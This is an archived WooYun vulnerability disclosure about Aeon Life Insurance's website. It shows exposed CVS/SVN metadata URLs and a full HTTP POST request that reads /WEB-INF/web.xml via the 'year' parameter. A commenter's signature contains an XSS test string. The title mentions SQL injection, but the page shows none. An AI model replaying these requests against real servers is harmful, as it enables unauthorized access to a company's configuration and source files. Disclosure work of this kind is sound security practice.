当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128526

漏洞标题:百年人寿主站SQL注入&信息泄漏漏洞打包

相关厂商:百年人寿保险股份有限公司

漏洞作者: 路人甲

提交时间:2015-07-23 07:58

修复时间:2015-07-28 08:00

公开时间:2015-07-28 08:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百年人寿主站漏洞打包

详细说明:

cvs泄漏
http://www.aeonlife.com.cn/product/hotIssue/CVS/Root

sendpix0.jpg


http://www.aeonlife.com.cn/product/hotIssue/CVS/Entries

sendpix1.jpg


svn泄漏
http://www.aeonlife.com.cn/global/js/.svn/entries
http://www.aeonlife.com.cn/mis/global/js/.svn/entries

sendpix2.jpg


post型任意文件读取与包含,参数:year

POST /cms/aboutAEON/development/import/index.jsp HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aeonlife.com.cn:80/
Cookie: JSESSIONID=1A2318B381BC203EAD1A386A923F8BCB.node1
Host: www.aeonlife.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
addHeight=&year=/WEB-INF/web.xml%3f


sendpix3.jpg


sendpix4.jpg


sendpix5.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-28 08:00

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-28 10:11 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    说好的注入呢

  2. 2015-07-28 16:39 | Lar2y ( 路人 | Rank:4 漏洞数:3 | 吃口屎冷静一下)

    说好的注入呢

  3. 2015-07-29 10:24 | 耀 ( 路人 | Rank:11 漏洞数:1 | 缺月挂疏桐)

    这种类型的漏洞是怎么找到的呢??